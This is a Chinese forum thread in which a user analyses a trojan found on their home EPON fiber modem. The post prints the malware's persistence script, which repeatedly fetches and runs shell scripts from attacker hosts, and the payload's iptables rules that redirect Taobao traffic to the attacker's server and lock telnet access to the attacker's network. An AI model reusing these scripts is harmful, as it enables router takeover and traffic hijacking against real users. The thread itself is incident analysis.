EPON终端被黑
本帖最后由 xzhower 于 2015-12-28 22:23 编辑最近发现家里上网特别慢,经常打不开网页,排查两天发现是家里EPON的Modem(型号RG200O-CA)被黑了。
telnet进入Modem,检查系统文件,突然telnet中断,无法再telnet。断电重启,可以telnet进去,过一会儿还是telnet会中断。遂断开光纤,此时telnet正常,不再发生中断现象,初步判断telnet中断现象与上网状态有关。怀疑是Modem被木马感染。反复PS检查当前进程信息,突然发现一行可疑信息:
......
wget -q -P /tmp http://koudaiba.sinaapp.com start.sh
......
此前因为仔细研究过这台Modem,开启了路由功能,并成功编译上传了一个打印服务器的程序,对这个Modem的系统比较了解,从未出现过这样的信息,因此可以断定确实是Modem受到了感染。
经过搜索,上面的那行命令是通过/home/sh.sh启动的,查看/home/sh.sh内容如下:
# cd /home
# ls -l
-rw-r--r-- 1 admin root 466 Nov 23 07:26 sh.sh <-------------<11月23日就被感染了
# cat sh.sh
#!/bin/sh
while true
do
sleep 100
wget -q -P /tmp http://59.56.68.183:20011/start.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/start.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/start.sh && sh /tmp/start.sh && while true
do
wget -q -P /tmp http://59.56.68.183:20012/while.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/while.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/while.sh || sleep 43200 && sh /tmp/while.sh || sleep 43200
done
done
http://59.56.68.183:20011, http://koudaiba.sinaapp.com/,http://abcdabcdabcdabcdabcd.com/
可以看到木马程序从三个网站下载shell脚本并反复循环执行,好吧,我也下载下来看看里面什么东东
#!/bin/shfor ip in"140.205.140.188" "110.75.96.102" "106.39.164.154" "140.205.142.214" "140.205.135.67" "140.205.164.96" "140.205.250.86" "110.75.206.8" "140.205.140.76" "140.205.32.93" "140.205.243.65" "140.205.170.51" "140.205.134.199" "140.205.230.37" "140.205.250.42" "110.75.96.109";doiptables -t nat -D PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002iptables -t nat -I PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002donefor ip in"120.24.0.0/14" "121.40.0.0/14" "119.28.0.0/15" "203.195.128.0/17" "115.28.0.0/15" "114.215.0.0/16" "120.55.0.0/16";doiptables -t nat -D PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114iptables -t nat -I PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114doneiptables -D INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROPiptables -I INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROPsleep 86400
看到一串IP地址,后面又设置了防火墙规则。最后面的两条太显眼,就是只允许指定的网段能够telnet控制我的Modem,我之前的telnet中断现象就是它干的。
前面两条规则是把对上面那些IP TCP 80端口的访问数据全部转发到了59.56.68.183的20002端口;
中间的两条规则是把对中间那段IP地址段的DNS访问全部转发到了114.114.114.114貌似这没有太大的危害。
那就再来看看一开始的哪些IP地址是谁的吧,随便找个IP地址试试:
C:\>telnet 140.205.140.188 80
GET / HTTP/1.0
HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 26 Dec 2015 15:04:00 GMT
Content-Type: text/html
Content-Length: 258
Connection: close
Location: http://www.taobao.com/
Via: ad052071.et2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<h1>302 Found</h1>
<p>The requested resource resides temporarily under a different URI.</p>
<hr/>Powered by Tengine</body>
</html>
乖乖,居然是淘宝的IP,原来这个木马劫持了淘宝的IP,受害的用户不知不觉就连到了木马控制人的服务器上,真是吓死宝宝了。到百度一搜,那些IP地址大都是阿里巴巴的。
而木马控制人的服务器IP59.56.68.183是福建某地的。
回头再来看看木马程序是如何启动的,查到/etc/有个rc_vtp2.0
-r-xr-xr-x 1 admin root 545 Nov 23 07:26 rc_vtp2.0
看看它的内容:
# cat rc_vtp2.0
#!/bin/sh
mkdir /var/tmp/tftp
mkdir /var/config
mkdir /var/ctc
mkdir /var/net-snmp
mkdir /var/syslog
/usr/sbin/lightbox
# enhanced the logic unix/inet socket buffer and backlog
echo -n "max_dgram_qlen is changed from "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo 100 > /proc/sys/net/unix/max_dgram_qlen
echo -n "to "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo -n "change the socket recv buffer uplimit to 512k"
echo "524288" > /proc/sys/net/core/rmem_max
sleep 1
cm_logic&
sleep 1
syslogd &
sh /home/sh.sh&
在最后多了一句,之前的内容可能是原来就有的,因为之前没有备份过系统文件,所以不好判断。
再看看rc_vtp2.0是在哪儿启动的,只在/etc/profile中有一句
......
/etc/rc_vtp2.0
......
这就奇怪了,按理/etc/profile只有在有人登录之后才会执行,是不是还有另外的地方启动呢?
先赶紧把这些木马文件干掉,回头继续查。
2015.12.26 23:19
文件干掉后速度恢复没有? 高手啊,完全看不懂命令 虽然看不懂,但还是看完了。 看得眼睛痛,都看完了 hotpop 发表于 2015-12-29 00:21
文件干掉后速度恢复没有?
还没有根治,肯定还有问题。 还可以被黑啊。。。 你每次上网的IP地址都不一样,怎么会劫持了你的光猫呢 好厉害的样子 boyoio 发表于 2015-12-29 19:33
这就是电信执意强制性开启光猫的路由功能留下的恶果,这么大面积的使用,只要是利用到了光猫的系统漏洞,可 ...
是我自己开的
页:
[1]
2